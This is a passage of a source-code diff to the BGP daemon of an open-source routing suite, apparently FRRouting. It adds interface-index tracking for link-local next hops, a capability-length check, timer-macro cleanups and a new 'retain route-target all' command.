sizeof(bnc_buf)));
@@ -659,15 +695,22 @@ void bgp_nht_interface_events(struct peer *peer)
struct bgp_nexthop_cache_head *table;
struct bgp_nexthop_cache *bnc;
struct prefix p;
+ ifindex_t ifindex = 0;
if (!IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
return;
if (!sockunion2hostprefix(&peer->su, &p))
return;
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (peer->conf_if && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
table = &bgp->nexthop_cache_table[AFI_IP6];
- bnc = bnc_find(table, &p, 0);
+ bnc = bnc_find(table, &p, 0, ifindex);
if (!bnc)
return;
@@ -703,7 +746,7 @@ void bgp_parse_nexthop_update(int command, vrf_id_t vrf_id)
afi = family2afi(match.family);
tree = &bgp->nexthop_cache_table[afi];
- bnc_nhc = bnc_find(tree, &match, nhr.srte_color);
+ bnc_nhc = bnc_find(tree, &match, nhr.srte_color, 0);
if (!bnc_nhc) {
if (BGP_DEBUG(nht, NHT))
zlog_debug(
@@ -714,7 +757,7 @@ void bgp_parse_nexthop_update(int command, vrf_id_t vrf_id)
tree = &bgp->import_check_table[afi];
- bnc_import = bnc_find(tree, &match, nhr.srte_color);
+ bnc_import = bnc_find(tree, &match, nhr.srte_color, 0);
if (!bnc_import) {
if (BGP_DEBUG(nht, NHT))
zlog_debug(
@@ -982,8 +1025,9 @@ void evaluate_paths(struct bgp_nexthop_cache *bnc)
bnc_str(bnc, buf, PREFIX2STR_BUFFER);
zlog_debug(
- "NH update for %s(%u)(%s) - flags %s chgflags %s- evaluate paths",
- buf, bnc->srte_color, bnc->bgp->name_pretty,
+ "NH update for %s(%d)(%u)(%s) - flags %s chgflags %s- evaluate paths",
+ buf, bnc->ifindex, bnc->srte_color,
+ bnc->bgp->name_pretty,
bgp_nexthop_dump_bnc_flags(bnc, bnc_buf,
sizeof(bnc_buf)),
bgp_nexthop_dump_bnc_change_flags(bnc, chg_buf,
@@ -1190,6 +1234,7 @@ void bgp_nht_reg_enhe_cap_intfs(struct peer *peer)
struct nexthop *nhop;
struct interface *ifp;
struct prefix p;
+ ifindex_t ifindex = 0;
if (peer->ifp)
return;
@@ -1203,8 +1248,14 @@ void bgp_nht_reg_enhe_cap_intfs(struct peer *peer)
if (p.family != AF_INET6)
return;
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (peer->conf_if && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
- bnc = bnc_find(&bgp->nexthop_cache_table[AFI_IP6], &p, 0);
+ bnc = bnc_find(&bgp->nexthop_cache_table[AFI_IP6], &p, 0, ifindex);
if (!bnc)
return;
@@ -1231,6 +1282,7 @@ void bgp_nht_dereg_enhe_cap_intfs(struct peer *peer)
struct nexthop *nhop;
struct interface *ifp;
struct prefix p;
+ ifindex_t ifindex = 0;
if (peer->ifp)
return;
@@ -1245,8 +1297,14 @@ void bgp_nht_dereg_enhe_cap_intfs(struct peer *peer)
if (p.family != AF_INET6)
return;
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (peer->conf_if && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
- bnc = bnc_find(&bgp->nexthop_cache_table[AFI_IP6], &p, 0);
+ bnc = bnc_find(&bgp->nexthop_cache_table[AFI_IP6], &p, 0, ifindex);
if (!bnc)
return;
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 7613ccc7df..45752a8ab6 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -125,7 +125,7 @@ static void bgp_packet_add(struct peer *peer, struct stream *s)
intmax_t delta;
uint32_t holdtime;
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
/* if the queue is empty, reset the "last OK" timestamp to
* now, otherwise if we write another packet immediately
* after it'll get confused
@@ -2002,8 +2002,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
gr_info->eor_required,
"EOR RCV",
gr_info->eor_received);
- BGP_TIMER_OFF(
- gr_info->t_select_deferral);
+ THREAD_OFF(gr_info->t_select_deferral);
gr_info->eor_required = 0;
gr_info->eor_received = 0;
/* Best path selection */
@@ -2510,7 +2509,7 @@ static int bgp_route_refresh_receive(struct peer *peer, bgp_size_t size)
return BGP_PACKET_NOOP;
}
- BGP_TIMER_OFF(peer->t_refresh_stalepath);
+ THREAD_OFF(peer->t_refresh_stalepath);
SET_FLAG(peer->af_sflags[afi][safi], PEER_STATUS_EORR_RECEIVED);
UNSET_FLAG(peer->af_sflags[afi][safi],
@@ -2621,6 +2620,14 @@ static int bgp_capability_msg_parse(struct peer *peer, uint8_t *pnt,
"%s CAPABILITY has action: %d, code: %u, length %u",
peer->host, action, hdr->code, hdr->length);
+ if (hdr->length < sizeof(struct capability_mp_data)) {
+ zlog_info(
+ "%pBP Capability structure is not properly filled out, expected at least %zu bytes but header length specified is %d",
+ peer, sizeof(struct capability_mp_data),
+ hdr->length);
+ return BGP_Stop;
+ }
+
/* Capability length check. */
if ((pnt + hdr->length + 3) > end) {
zlog_info("%s Capability length error", peer->host);
@@ -2777,7 +2784,7 @@ void bgp_process_packet(struct thread *thread)
bgp_size_t size;
char notify_data_length[2];
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
peer->curr = stream_fifo_pop(peer->ibuf);
}
@@ -2904,7 +2911,7 @@ void bgp_process_packet(struct thread *thread)
if (fsm_update_result != FSM_PEER_TRANSFERRED
&& fsm_update_result != FSM_PEER_STOPPED) {
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
// more work to do, come back later
if (peer->ibuf->count > 0)
thread_add_event(
diff --git a/bgpd/bgp_route.c b/bgpd/bgp_route.c
index b35cbeb21f..2fd747a113 100644
--- a/bgpd/bgp_route.c
+++ b/bgpd/bgp_route.c
@@ -1773,12 +1773,10 @@ static void bgp_peer_remove_private_as(struct bgp *bgp, afi_t afi, safi_t safi,
static void bgp_peer_as_override(struct bgp *bgp, afi_t afi, safi_t safi,
struct peer *peer, struct attr *attr)
{
- if (peer->sort == BGP_PEER_EBGP
- && peer_af_flag_check(peer, afi, safi, PEER_FLAG_AS_OVERRIDE)) {
- if (aspath_single_asn_check(attr->aspath, peer->as))
- attr->aspath = aspath_replace_specific_asn(
- attr->aspath, peer->as, bgp->as);
- }
+ if (peer->sort == BGP_PEER_EBGP &&
+ peer_af_flag_check(peer, afi, safi, PEER_FLAG_AS_OVERRIDE))
+ attr->aspath = aspath_replace_specific_asn(attr->aspath,
+ peer->as, bgp->as);
}
void bgp_attr_add_llgr_community(struct attr *attr)
@@ -3204,7 +3202,7 @@ int bgp_best_path_select_defer(struct bgp *bgp, afi_t afi, safi_t safi)
thread_info = THREAD_ARG(t);
XFREE(MTYPE_TMP, thread_info);
- BGP_TIMER_OFF(bgp->gr_info[afi][safi].t_route_select);
+ THREAD_OFF(bgp->gr_info[afi][safi].t_route_select);
}
if (BGP_DEBUG(update, UPDATE_OUT)) {
@@ -3785,6 +3783,7 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
uint8_t pi_sub_type = 0;
bool force_evpn_import = false;
safi_t orig_safi = safi;
+ bool leak_success = true;
if (frrtrace_enabled(frr_bgp, process_update)) {
char pfxprint[PREFIX2STR_BUFFER];
@@ -4410,7 +4409,7 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
if ((SAFI_MPLS_VPN == safi)
&& (bgp->inst_type == BGP_INSTANCE_TYPE_DEFAULT)) {
- vpn_leak_to_vrf_update(bgp, pi);
+ leak_success = vpn_leak_to_vrf_update(bgp, pi);
}
#ifdef ENABLE_BGP_VNC
@@ -4425,7 +4424,13 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
type, sub_type, NULL);
}
#endif
-
+ if ((safi == SAFI_MPLS_VPN) &&
+ !CHECK_FLAG(bgp->af_flags[afi][safi],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL) &&
+ !leak_success) {
+ bgp_unlink_nexthop(pi);
+ bgp_path_info_delete(dest, pi);
+ }
return 0;
} // End of implicit withdraw
@@ -4559,8 +4564,7 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
}
if ((SAFI_MPLS_VPN == safi)
&& (bgp->inst_type == BGP_INSTANCE_TYPE_DEFAULT)) {
-
- vpn_leak_to_vrf_update(bgp, new);
+ leak_success = vpn_leak_to_vrf_update(bgp, new);
}
#ifdef ENABLE_BGP_VNC
if (SAFI_MPLS_VPN == safi) {
@@ -4574,6 +4578,13 @@ int bgp_update(struct peer *peer, const struct prefix *p, uint32_t addpath_id,
sub_type, NULL);
}
#endif
+ if ((safi == SAFI_MPLS_VPN) &&
+ !CHECK_FLAG(bgp->af_flags[afi][safi],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL) &&
+ !leak_success) {
+ bgp_unlink_nexthop(new);
+ bgp_path_info_delete(dest, new);
+ }
return 0;
@@ -4744,7 +4755,7 @@ void bgp_stop_announce_route_timer(struct peer_af *paf)
if (!paf->t_announce_route)
return;
- thread_cancel(&paf->t_announce_route);
+ THREAD_OFF(paf->t_announce_route);
}
/*
@@ -5042,7 +5053,7 @@ void bgp_soft_reconfig_table_task_cancel(const struct bgp *bgp,
list_delete(&ntable->soft_reconfig_peers);
bgp_soft_reconfig_table_flag(ntable, false);
- BGP_TIMER_OFF(ntable->soft_reconfig_thread);
+ THREAD_OFF(ntable->soft_reconfig_thread);
}
}
@@ -14189,9 +14200,9 @@ DEFUN (show_ip_bgp_neighbor_received_prefix_filter,
IP_STR
BGP_STR
BGP_INSTANCE_HELP_STR
- "Address Family\n"
- "Address Family\n"
- "Address Family modifier\n"
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR
"Detailed information on TCP and BGP neighbor connections\n"
"Neighbor to display information about\n"
"Neighbor to display information about\n"
@@ -14377,7 +14388,7 @@ DEFUN (show_bgp_afi_vpn_rd_route,
SHOW_STR
BGP_STR
BGP_AFI_HELP_STR
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR
"Display information for a route distinguisher\n"
"Route Distinguisher\n"
"All Route Distinguishers\n"
diff --git a/bgpd/bgp_updgrp.c b/bgpd/bgp_updgrp.c
index ea8d2330c5..405dd8f6ec 100644
--- a/bgpd/bgp_updgrp.c
+++ b/bgpd/bgp_updgrp.c
@@ -91,7 +91,8 @@ static void sync_init(struct update_subgroup *subgrp,
bgp_adv_fifo_init(&subgrp->sync->withdraw);
bgp_adv_fifo_init(&subgrp->sync->withdraw_low);
subgrp->hash =
- hash_create(baa_hash_key, baa_hash_cmp, "BGP SubGroup Hash");
+ hash_create(bgp_advertise_attr_hash_key,
+ bgp_advertise_attr_hash_cmp, "BGP SubGroup Hash");
/* We use a larger buffer for subgrp->work in the event that:
* - We RX a BGP_UPDATE where the attributes alone are just
@@ -115,8 +116,11 @@ static void sync_init(struct update_subgroup *subgrp,
static void sync_delete(struct update_subgroup *subgrp)
{
XFREE(MTYPE_BGP_SYNCHRONISE, subgrp->sync);
- if (subgrp->hash)
+ if (subgrp->hash) {
+ hash_clean(subgrp->hash,
+ (void (*)(void *))bgp_advertise_attr_free);
hash_free(subgrp->hash);
+ }
subgrp->hash = NULL;
if (subgrp->work)
stream_free(subgrp->work);
@@ -1896,7 +1900,7 @@ void update_group_refresh_default_originate_route_map(struct thread *thread)
bgp = THREAD_ARG(thread);
update_group_walk(bgp, update_group_default_originate_route_map_walkcb,
reason);
- thread_cancel(&bgp->t_rmap_def_originate_eval);
+ THREAD_OFF(bgp->t_rmap_def_originate_eval);
bgp_unlock(bgp);
}
diff --git a/bgpd/bgp_updgrp_adv.c b/bgpd/bgp_updgrp_adv.c
index 0f7f2f4c02..27e3677702 100644
--- a/bgpd/bgp_updgrp_adv.c
+++ b/bgpd/bgp_updgrp_adv.c
@@ -115,23 +115,22 @@ static void subgrp_withdraw_stale_addpath(struct updwalk_context *ctx,
/* Look through all of the paths we have advertised for this rn and send
* a withdraw for the ones that are no longer present */
RB_FOREACH_SAFE (adj, bgp_adj_out_rb, &ctx->dest->adj_out, adj_next) {
+ if (adj->subgroup != subgrp)
+ continue;
- if (adj->subgroup == subgrp) {
- for (pi = bgp_dest_get_bgp_path_info(ctx->dest); pi;
- pi = pi->next) {
- id = bgp_addpath_id_for_peer(peer, afi, safi,
- &pi->tx_addpath);
+ for (pi = bgp_dest_get_bgp_path_info(ctx->dest); pi;
+ pi = pi->next) {
+ id = bgp_addpath_id_for_peer(peer, afi, safi,
+ &pi->tx_addpath);
- if (id == adj->addpath_tx_id) {
- break;
- }
+ if (id == adj->addpath_tx_id) {
+ break;
}
+ }
- if (!pi) {
- subgroup_process_announce_selected(
- subgrp, NULL, ctx->dest,
- adj->addpath_tx_id);
- }
+ if (!pi) {
+ subgroup_process_announce_selected(
+ subgrp, NULL, ctx->dest, adj->addpath_tx_id);
}
}
}
@@ -165,6 +164,7 @@ static int group_announce_route_walkcb(struct update_group *updgrp, void *arg)
* coalesce timer fires.
*/
if (!subgrp->t_coalesce) {
+
/* An update-group that uses addpath */
if (addpath_capable) {
subgrp_withdraw_stale_addpath(ctx, subgrp);
@@ -193,7 +193,6 @@ static int group_announce_route_walkcb(struct update_group *updgrp, void *arg)
peer, afi, safi,
&ctx->pi->tx_addpath));
}
-
/* An update-group that does not use addpath */
else {
if (ctx->pi) {
@@ -249,39 +248,37 @@ static void subgrp_show_adjq_vty(struct update_subgroup *subgrp,
for (dest = bgp_table_top(table); dest; dest = bgp_route_next(dest)) {
const struct prefix *dest_p = bgp_dest_get_prefix(dest);
- RB_FOREACH (adj, bgp_adj_out_rb, &dest->adj_out)
- if (adj->subgroup == subgrp) {
- if (header1) {
- vty_out(vty,
- "BGP table version is %" PRIu64
- ", local router ID is %pI4\n",
- table->version,
- &bgp->router_id);
- vty_out(vty, BGP_SHOW_SCODE_HEADER);
- vty_out(vty, BGP_SHOW_OCODE_HEADER);
- header1 = 0;
- }
- if (header2) {
- vty_out(vty, BGP_SHOW_HEADER);
- header2 = 0;
- }
- if ((flags & UPDWALK_FLAGS_ADVQUEUE) && adj->adv
- && adj->adv->baa) {
- route_vty_out_tmp(vty, dest, dest_p,
- adj->adv->baa->attr,
- SUBGRP_SAFI(subgrp),
- 0, NULL, false);
- output_count++;
- }
- if ((flags & UPDWALK_FLAGS_ADVERTISED)
- && adj->attr) {
- route_vty_out_tmp(vty, dest, dest_p,
- adj->attr,
- SUBGRP_SAFI(subgrp),
- 0, NULL, false);
- output_count++;
- }
+ RB_FOREACH (adj, bgp_adj_out_rb, &dest->adj_out) {
+ if (adj->subgroup != subgrp)
+ continue;
+
+ if (header1) {
+ vty_out(vty,
+ "BGP table version is %" PRIu64
+ ", local router ID is %pI4\n",
+ table->version, &bgp->router_id);
+ vty_out(vty, BGP_SHOW_SCODE_HEADER);
+ vty_out(vty, BGP_SHOW_OCODE_HEADER);
+ header1 = 0;
+ }
+ if (header2) {
+ vty_out(vty, BGP_SHOW_HEADER);
+ header2 = 0;
+ }
+ if ((flags & UPDWALK_FLAGS_ADVQUEUE) && adj->adv &&
+ adj->adv->baa) {
+ route_vty_out_tmp(
+ vty, dest, dest_p, adj->adv->baa->attr,
+ SUBGRP_SAFI(subgrp), 0, NULL, false);
+ output_count++;
}
+ if ((flags & UPDWALK_FLAGS_ADVERTISED) && adj->attr) {
+ route_vty_out_tmp(vty, dest, dest_p, adj->attr,
+ SUBGRP_SAFI(subgrp), 0, NULL,
+ false);
+ output_count++;
+ }
+ }
}
if (output_count != 0)
vty_out(vty, "\nTotal number of prefixes %ld\n", output_count);
@@ -347,7 +344,7 @@ static void subgroup_coalesce_timer(struct thread *thread)
SUBGRP_FOREACH_PEER (subgrp, paf) {
peer = PAF_PEER(paf);
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, 0);
}
}
@@ -437,7 +434,7 @@ bgp_advertise_clean_subgroup(struct update_subgroup *subgrp,
next = baa->adv;
/* Unintern BGP advertise attribute. */
- bgp_advertise_unintern(subgrp->hash, baa);
+ bgp_advertise_attr_unintern(subgrp->hash, baa);
} else
fhead = &subgrp->sync->withdraw;
@@ -523,7 +520,7 @@ void bgp_adj_out_set_subgroup(struct bgp_dest *dest,
/* bgp_path_info adj_out reference */
adv->pathi = bgp_path_info_lock(path);
- adv->baa = bgp_advertise_intern(subgrp->hash, attr);
+ adv->baa = bgp_advertise_attr_intern(subgrp->hash, attr);
adv->adj = adj;
adj->attr_hash = attr_hash;
@@ -683,49 +680,47 @@ void subgroup_announce_table(struct update_subgroup *subgrp,
/* Check if the route can be advertised */
advertise = bgp_check_advertise(bgp, dest);
- for (ri = bgp_dest_get_bgp_path_info(dest); ri; ri = ri->next)
-
- if (bgp_check_selected(ri, peer, addpath_capable, afi,
- safi)) {
- if (subgroup_announce_check(dest, ri, subgrp,
- dest_p, &attr,
- NULL)) {
- /* Check if route can be advertised */
- if (advertise) {
- if (!bgp_check_withdrawal(bgp,
- dest))
- bgp_adj_out_set_subgroup(
- dest, subgrp,
- &attr, ri);
- else
- bgp_adj_out_unset_subgroup(
- dest, subgrp, 1,
- bgp_addpath_id_for_peer(
- peer,
- afi,
- safi,
- &ri->tx_addpath));
- }
- } else {
- /* If default originate is enabled for
- * the peer, do not send explicit
- * withdraw. This will prevent deletion
- * of default route advertised through
- * default originate
- */
- if (CHECK_FLAG(
- peer->af_flags[afi][safi],
- PEER_FLAG_DEFAULT_ORIGINATE)
- && is_default_prefix(bgp_dest_get_prefix(dest)))
- break;
-
- bgp_adj_out_unset_subgroup(
- dest, subgrp, 1,
- bgp_addpath_id_for_peer(
- peer, afi, safi,
- &ri->tx_addpath));
+ for (ri = bgp_dest_get_bgp_path_info(dest); ri; ri = ri->next) {
+
+ if (!bgp_check_selected(ri, peer, addpath_capable, afi,
+ safi))
+ continue;
+
+ if (subgroup_announce_check(dest, ri, subgrp, dest_p,
+ &attr, NULL)) {
+ /* Check if route can be advertised */
+ if (advertise) {
+ if (!bgp_check_withdrawal(bgp, dest))
+ bgp_adj_out_set_subgroup(
+ dest, subgrp, &attr,
+ ri);
+ else
+ bgp_adj_out_unset_subgroup(
+ dest, subgrp, 1,
+ bgp_addpath_id_for_peer(
+ peer, afi, safi,
+ &ri->tx_addpath));
}
+ } else {
+ /* If default originate is enabled for
+ * the peer, do not send explicit
+ * withdraw. This will prevent deletion
+ * of default route advertised through
+ * default originate
+ */
+ if (CHECK_FLAG(peer->af_flags[afi][safi],
+ PEER_FLAG_DEFAULT_ORIGINATE) &&
+ is_default_prefix(
+ bgp_dest_get_prefix(dest)))
+ break;
+
+ bgp_adj_out_unset_subgroup(
+ dest, subgrp, 1,
+ bgp_addpath_id_for_peer(
+ peer, afi, safi,
+ &ri->tx_addpath));
}
+ }
}
UNSET_FLAG(subgrp->sflags, SUBGRP_STATUS_TABLE_REPARSING);
diff --git a/bgpd/bgp_vty.c b/bgpd/bgp_vty.c
index 19901792ea..0eba5ea447 100644
--- a/bgpd/bgp_vty.c
+++ b/bgpd/bgp_vty.c
@@ -951,14 +951,24 @@ static void bgp_clear_vty_error(struct vty *vty, struct peer *peer, afi_t afi,
{
switch (error) {
case BGP_ERR_AF_UNCONFIGURED:
- vty_out(vty,
- "%% BGP: Enable %s address family for the neighbor %s\n",
- get_afi_safi_str(afi, safi, false), peer->host);
+ if (vty)
+ vty_out(vty,
+ "%% BGP: Enable %s address family for the neighbor %s\n",
+ get_afi_safi_str(afi, safi, false), peer->host);
+ else
+ zlog_warn(
+ "%% BGP: Enable %s address family for the neighbor %s",
+ get_afi_safi_str(afi, safi, false), peer->host);
break;
case BGP_ERR_SOFT_RECONFIG_UNCONFIGURED:
- vty_out(vty,
- "%% BGP: Inbound soft reconfig for %s not possible as it\n has neither refresh capability, nor inbound soft reconfig\n",
- peer->host);
+ if (vty)
+ vty_out(vty,
+ "%% BGP: Inbound soft reconfig for %s not possible as it\n has neither refresh capability, nor inbound soft reconfig\n",
+ peer->host);
+ else
+ zlog_warn(
+ "%% BGP: Inbound soft reconfig for %s not possible as it has neither refresh capability, nor inbound soft reconfig",
+ peer->host);
break;
default:
break;
@@ -1274,6 +1284,11 @@ static void bgp_clear_star_soft_out(struct vty *vty, const char *name)
}
+void bgp_clear_soft_in(struct bgp *bgp, afi_t afi, safi_t safi)
+{
+ bgp_clear(NULL, bgp, afi, safi, clear_all, BGP_CLEAR_SOFT_IN, NULL);
+}
+
#ifndef VTYSH_EXTRACT_PL
#include "bgpd/bgp_vty_clippy.c"
#endif
@@ -2055,7 +2070,7 @@ DEFUN (no_bgp_maxmed_onstartup,
/* Cancel max-med onstartup if its on */
if (bgp->t_maxmed_onstartup) {
- thread_cancel(&bgp->t_maxmed_onstartup);
+ THREAD_OFF(bgp->t_maxmed_onstartup);
bgp->maxmed_onstartup_over = 1;
}
@@ -3840,11 +3855,17 @@ DEFPY(bgp_default_afi_safi, bgp_default_afi_safi_cmd,
afi_t afi = bgp_vty_afi_from_str(afi_str);
safi_t safi;
+ /*
+ * Impossible situation but making coverity happy
+ */
+ assert(afi != AFI_MAX);
+
if (strmatch(safi_str, "labeled"))
safi = bgp_vty_safi_from_str("labeled-unicast");
else
safi = bgp_vty_safi_from_str(safi_str);
+ assert(safi != SAFI_MAX);
if (no)
bgp->default_af[afi][safi] = false;
else {
@@ -6838,7 +6859,7 @@ static int peer_port_vty(struct vty *vty, const char *ip_str, int afi,
uint16_t port;
struct servent *sp;
- peer = peer_lookup_vty(vty, ip_str);
+ peer = peer_and_group_lookup_vty(vty, ip_str);
if (!peer)
return CMD_WARNING_CONFIG_FAILED;
@@ -6857,9 +6878,9 @@ static int peer_port_vty(struct vty *vty, const char *ip_str, int afi,
/* Set specified peer's BGP port. */
DEFUN (neighbor_port,
neighbor_port_cmd,
- "neighbor <A.B.C.D|X:X::X:X> port (0-65535)",
+ "neighbor <A.B.C.D|X:X::X:X|WORD> port (0-65535)",
NEIGHBOR_STR
- NEIGHBOR_ADDR_STR
+ NEIGHBOR_ADDR_STR2
"Neighbor's BGP port\n"
"TCP port number\n")
{
@@ -6871,10 +6892,10 @@ DEFUN (neighbor_port,
DEFUN (no_neighbor_port,
no_neighbor_port_cmd,
- "no neighbor <A.B.C.D|X:X::X:X> port [(0-65535)]",
+ "no neighbor <A.B.C.D|X:X::X:X|WORD> port [(0-65535)]",
NO_STR
NEIGHBOR_STR
- NEIGHBOR_ADDR_STR
+ NEIGHBOR_ADDR_STR2
"Neighbor's BGP port\n"
"TCP port number\n")
{
@@ -7256,7 +7277,7 @@ DEFUN (bgp_set_route_map_delay_timer,
* fired.
*/
if (!rmap_delay_timer && bm->t_rmap_update) {
- BGP_TIMER_OFF(bm->t_rmap_update);
+ THREAD_OFF(bm->t_rmap_update);
thread_execute(bm->master, bgp_route_map_update_timer,
NULL, 0);
}
@@ -9367,7 +9388,7 @@ DEFUN_NOSH (address_family_ipv4_safi,
address_family_ipv4_safi_cmd,
"address-family ipv4 [<unicast|multicast|vpn|labeled-unicast|flowspec>]",
"Enter Address Family command mode\n"
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_WITH_LABEL_HELP_STR)
{
@@ -9392,7 +9413,7 @@ DEFUN_NOSH (address_family_ipv6_safi,
address_family_ipv6_safi_cmd,
"address-family ipv6 [<unicast|multicast|vpn|labeled-unicast|flowspec>]",
"Enter Address Family command mode\n"
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_WITH_LABEL_HELP_STR)
{
if (argc == 3) {
@@ -9417,8 +9438,8 @@ DEFUN_NOSH (address_family_vpnv4,
address_family_vpnv4_cmd,
"address-family vpnv4 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV4_NODE;
return CMD_SUCCESS;
@@ -9428,8 +9449,8 @@ DEFUN_NOSH (address_family_vpnv6,
address_family_vpnv6_cmd,
"address-family vpnv6 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV6_NODE;
return CMD_SUCCESS;
@@ -9440,8 +9461,8 @@ DEFUN_NOSH (address_family_evpn,
address_family_evpn_cmd,
"address-family l2vpn evpn",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
VTY_DECLVAR_CONTEXT(bgp, bgp);
vty->node = BGP_EVPN_NODE;
@@ -9692,9 +9713,9 @@ DEFUN (clear_ip_bgp_all,
BGP_STR
BGP_INSTANCE_HELP_STR
BGP_AFI_HELP_STR
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_WITH_LABEL_HELP_STR
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR
"Clear all peers\n"
"BGP IPv4 neighbor to clear\n"
"BGP IPv6 neighbor to clear\n"
@@ -9827,7 +9848,7 @@ DEFUN (clear_bgp_ipv6_safi_prefix,
CLEAR_STR
IP_STR
BGP_STR
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_HELP_STR
"Clear bestpath and re-advertise\n"
"IPv6 prefix\n")
@@ -9851,7 +9872,7 @@ DEFUN (clear_bgp_instance_ipv6_safi_prefix,
IP_STR
BGP_STR
BGP_INSTANCE_HELP_STR
- "Address Family\n"
+ BGP_AF_STR
BGP_SAFI_HELP_STR
"Clear bestpath and re-advertise\n"
"IPv6 prefix\n")
@@ -10173,9 +10194,11 @@ DEFUN (show_bgp_memory,
count, mtype_memstr(memstrbuf, sizeof(memstrbuf),
count * sizeof(struct community)));
if ((count = mtype_stats_alloc(MTYPE_ECOMMUNITY)))
- vty_out(vty, "%ld BGP community entries, using %s of memory\n",
- count, mtype_memstr(memstrbuf, sizeof(memstrbuf),
- count * sizeof(struct ecommunity)));
+ vty_out(vty,
+ "%ld BGP ext-community entries, using %s of memory\n",
+ count,
+ mtype_memstr(memstrbuf, sizeof(memstrbuf),
+ count * sizeof(struct ecommunity)));
if ((count = mtype_stats_alloc(MTYPE_LCOMMUNITY)))
vty_out(vty,
"%ld BGP large-community entries, using %s of memory\n",
@@ -10392,9 +10415,24 @@ static void bgp_show_failed_summary(struct vty *vty, struct bgp *bgp,
static char *bgp_peer_description_stripped(char *desc, uint32_t size)
{
static char stripped[BUFSIZ];
- uint32_t len = size > strlen(desc) ? strlen(desc) : size;
+ uint32_t i = 0;
+ uint32_t last_space = 0;
+
+ while (i < size) {
+ if (*(desc + i) == 0) {
+ stripped[i] = '\0';
+ return stripped;
+ }
+ if (i != 0 && *(desc + i) == ' ' && last_space != i - 1)
+ last_space = i;
+ stripped[i] = *(desc + i);
+ i++;
+ }
- strlcpy(stripped, desc, len + 1);
+ if (last_space > size)
+ stripped[size + 1] = '\0';
+ else
+ stripped[last_space] = '\0';
return stripped;
}
@@ -14672,8 +14710,8 @@ DEFUN (show_ip_bgp_neighbors,
IP_STR
BGP_STR
BGP_INSTANCE_HELP_STR
- "Address Family\n"
- "Address Family\n"
+ BGP_AF_STR
+ BGP_AF_STR
"Detailed information on TCP and BGP neighbor connections\n"
"Neighbor to display information about\n"
"Neighbor to display information about\n"
@@ -16315,6 +16353,34 @@ DEFUN(no_neighbor_tcp_mss, no_neighbor_tcp_mss_cmd,
return peer_tcp_mss_vty(vty, argv[peer_index]->arg, NULL);
}
+DEFPY(bgp_retain_route_target, bgp_retain_route_target_cmd,
+ "[no$no] bgp retain route-target all",
+ NO_STR BGP_STR
+ "Retain BGP updates\n"
+ "Retain BGP updates based on route-target values\n"
+ "Retain all BGP updates\n")
+{
+ bool check;
+ struct bgp *bgp = VTY_GET_CONTEXT(bgp);
+
+ check = CHECK_FLAG(bgp->af_flags[bgp_node_afi(vty)][bgp_node_safi(vty)],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL);
+ if (check != !no) {
+ if (!no)
+ SET_FLAG(bgp->af_flags[bgp_node_afi(vty)]
+ [bgp_node_safi(vty)],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL);
+ else
+ UNSET_FLAG(bgp->af_flags[bgp_node_afi(vty)]
+ [bgp_node_safi(vty)],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL);
+ /* trigger a flush to re-sync with ADJ-RIB-in */
+ bgp_clear(vty, bgp, bgp_node_afi(vty), bgp_node_safi(vty),
+ clear_all, BGP_CLEAR_SOFT_IN, NULL);
+ }
+ return CMD_SUCCESS;
+}
+
static void bgp_config_write_redistribute(struct vty *vty, struct bgp *bgp,
afi_t afi, safi_t safi)
{
@@ -17197,6 +17263,14 @@ static void bgp_config_write_peer_af(struct vty *vty, struct bgp *bgp,
}
}
+static void bgp_vpn_config_write(struct vty *vty, struct bgp *bgp, afi_t afi,
+ safi_t safi)
+{
+ if (!CHECK_FLAG(bgp->af_flags[afi][safi],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL))
+ vty_out(vty, " no bgp retain route-target all\n");
+}
+
/* Address family based peer configuration display. */
static void bgp_config_write_family(struct vty *vty, struct bgp *bgp, afi_t afi,
safi_t safi)
